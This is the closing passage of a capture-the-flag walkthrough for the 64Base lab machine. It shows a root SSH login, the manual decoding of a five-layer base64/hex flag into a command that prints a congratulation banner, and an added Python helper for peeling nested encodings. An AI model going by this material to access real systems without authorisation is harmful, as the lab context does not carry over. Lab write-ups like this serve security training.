Enter passphrase for key './Desktop/sshkey':
Last login: Tue Dec 6 05:40:07 2016 from 172.16.0.18
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
The sixth and final flag is printed at login. Peeling its five layers (base64, hex, base64, hex, base64) leaves one last command, and running it delivers the final bit of trolling.
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d
4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p
NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo=
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d
596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p
YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg==
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d
base64 -d /var/local/.luke|less.real
root@64base:~# base64 -d /var/local/.luke|less.real
-----SNIP-----
____________________________________________________________________________ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| _ _ ____ __ __ __ __ ____ _ _ _ _____ ______ | \ | | / __ \\ \ / / \ \ / // __ \ | | | |( )| __ \ | ____| | \| || | | |\ \ /\ / / \ \_/ /| | | || | | ||/ | |__) || |__ | . ` || | | | \ \/ \/ / \ / | | | || | | | | _ / | __| | |\ || |__| | \ /\ / | | | |__| || |__| | | | \ \ | |____ |_| \_| \____/ \/ \/ |_| \____/ \____/ |_| \_\|______| _ ______ _____ _____ _ /\ | || ____|| __ \|_ _|| | / \ | || |__ | | | | | | | | / /\ \ _ | || __| | | | | | | | | / ____ \ | |__| || |____ | |__| |_| |_ |_| /_/ \_\ \____/ |______||_____/|_____|(_) ______ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______|
I hope you enjoyed this challenge
Please leave comments & feedback @ https://www.vulnhub.com/?q=64base
-----------------------------------
64Base Challenge by 3mrgnc3
https://3mrgnc3.ninja/challenges
-----------------------------------
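Every decode in this walkthrough (flag1 from the page source, the three login.php fragments for flag2, the JPEG comment holding the key, and the five-layer flag6 chain just above) is the same pattern: hex and base64 wrapped around each other an unknown number of times, sometimes split across several HTML attributes. The Python below is an added example, not code from the walkthrough or from the challenge author. peel() keeps decoding while each result is still printable text and reports which layers it removed, which is what the repeated 'xxd -r -p | base64 -d' pipelines do by hand; join_hex_fragments() reassembles split fragments in document order; unwrap_flag() pulls the payload out of the flagN{...} wrapper; wrap_layers() is the inverse, useful for building test data. The demo at the bottom uses flag1's hex string exactly as it appears in the page source above.

```python
"""Peel nested hex/base64 layers and reassemble split hex fragments.

Added example for this walkthrough; not the challenge author's code.
"""
import base64
import binascii
import re
import string

HEX = re.compile(r"^[0-9a-fA-F]+$")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
FLAG = re.compile(r"flag(\d+)\{(.*?)\}", re.DOTALL)
HEX_RUN = re.compile(r"[0-9a-fA-F]{16,}")   # id="..." values, basictoken=...
PRINTABLE = set(string.printable)


def _printable(raw):
    """True if `raw` decodes as UTF-8 and contains only printable ASCII."""
    try:
        return all(c in PRINTABLE for c in raw.decode("utf-8"))
    except UnicodeDecodeError:
        return False


def peel(data, max_layers=16):
    """Strip hex and base64 layers until the payload stops looking encoded.

    Returns (plaintext, layers), e.g. ("flag1{...}", ["hex", "base64"]).
    Hex is tested first because a hex string is also valid base64 alphabet;
    a decode that yields non-printable bytes ends the chain instead of
    counting as a layer, so an ordinary word is not "decoded" into junk.
    """
    if isinstance(data, str):
        data = data.encode()
    cur, layers = data.strip(), []
    for _ in range(max_layers):
        text = cur.decode("ascii", "ignore").strip()
        try:
            if HEX.match(text) and len(text) % 2 == 0:
                kind, nxt = "hex", binascii.unhexlify(text)
            elif B64.match(text) and len(text) % 4 == 0:
                kind, nxt = "base64", base64.b64decode(text, validate=True)
            else:
                break
        except (binascii.Error, ValueError):
            break
        if not _printable(nxt):
            break
        layers.append(kind)
        cur = nxt.strip()
    return cur.decode("utf-8", "replace"), layers


def unwrap_flag(text):
    """Return (number, payload) for a flagN{payload} string, else None."""
    m = FLAG.search(text)
    return (int(m.group(1)), m.group(2)) if m else None


def join_hex_fragments(html):
    """Concatenate every long hex run in `html` in document order.

    This is what flag2 needed: the username id, the password id and the
    basictoken comment each carried one part of a single hex string.
    """
    return "".join(HEX_RUN.findall(html))


def wrap_layers(payload):
    """hex(base64(payload)): the encoding the challenge applies, for test data."""
    return binascii.hexlify(base64.b64encode(payload)).decode()


# flag1's hex string exactly as found in the page source of the main site.
FLAG1_HEX = ("5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c4649"
             "53587055616b4a56576b644752574e7151586853534842575555684b6246524551"
             "586454656b5a77596d316a4d454e6e5054313943673d3d0a")

if __name__ == "__main__":
    outer, layers = peel(FLAG1_HEX)
    print(layers, outer)
    number, payload = unwrap_flag(outer)
    print("flag%d payload ->" % number, peel(payload))
```

The printable check is the important design choice: without it, any short word made of base64 characters (or a hex-looking token such as a git commit id) would be decoded into binary garbage and the loop would lose the real plaintext. The page's "everybody with must die" clue, for instance, passes through peel() unchanged.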
Conclusion
This was an awesome challenge which had a lot of tricks up its sleeve.
Whenever I thought I was on the right track I hit a dead end; after a while it felt like a maze in which I needed to find my way.
A great job of building this challenge and many thanks to 3mrgnc3 and vulnhub.com.
Can’t wait for the next challenge.